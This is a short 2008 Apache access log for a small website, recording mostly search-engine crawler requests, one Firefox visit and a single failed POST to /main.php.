67.195.37.109 - - [03/Jun/2008:15:59:47 +0200] "GET /zampa/lybia/ HTTP/1.0" 200 3036 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.37.109 - - [03/Jun/2008:16:13:19 +0200] "GET /f-other.html HTTP/1.0" 200 33189 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
220.181.19.167 - - [03/Jun/2008:16:19:27 +0200] "GET /zampa/ HTTP/1.1" 200 7153 "-" "Sogou web spider/4.0(+http://www.sogou.com/docs/help/webmasters.htm#07)"
216.81.36.130 - - [03/Jun/2008:16:19:50 +0200] "GET / HTTP/1.1" 200 10127 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [03/Jun/2008:16:19:51 +0200] "GET /ve-icon-2.ico HTTP/1.1" 200 2238 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [03/Jun/2008:16:19:51 +0200] "GET /favicon.ico HTTP/1.1" 404 2748 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
216.81.36.130 - - [03/Jun/2008:16:19:51 +0200] "GET /framez_0.html HTTP/1.1" 200 12444 "http://www.various-euro.com/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14"
74.6.28.87 - - [03/Jun/2008:16:21:13 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
67.195.52.98 - - [03/Jun/2008:16:21:14 +0200] "GET /schubb/schubb-3.html HTTP/1.0" 200 17546 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.216 - - [03/Jun/2008:16:26:27 +0200] "GET /robots.txt HTTP/1.0" 200 64 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [03/Jun/2008:16:26:28 +0200] "GET /schubb/schubb-1.html HTTP/1.0" 200 9070 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [03/Jun/2008:16:30:43 +0200] "GET /bannerz/ubu-shot.png HTTP/1.0" 200 200117 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
65.55.212.216 - - [03/Jun/2008:16:30:47 +0200] "GET /framez-schubb2.html HTTP/1.0" 200 4314 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
74.6.8.121 - - [03/Jun/2008:16:34:23 +0200] "GET /schubb/schubb-4.html HTTP/1.0" 200 17746 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:17:02:40 +0200] "GET /f-actions.html HTTP/1.0" 200 10429 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.8.121 - - [03/Jun/2008:17:03:18 +0200] "GET /sendi-agent/Interfiction-sendi.mpg HTTP/1.0" 200 13300252 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
65.55.212.216 - - [03/Jun/2008:17:24:25 +0200] "GET /bmpp/euro_pal_111.html HTTP/1.0" 200 2129 "-" "msnbot-media/1.0 (+http://search.msn.com/msnbot.htm)"
194.72.9.25 - - [03/Jun/2008:17:42:05 +0200] "POST /main.php HTTP/1.1" 404 2748 "http://various-euro.com/main.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
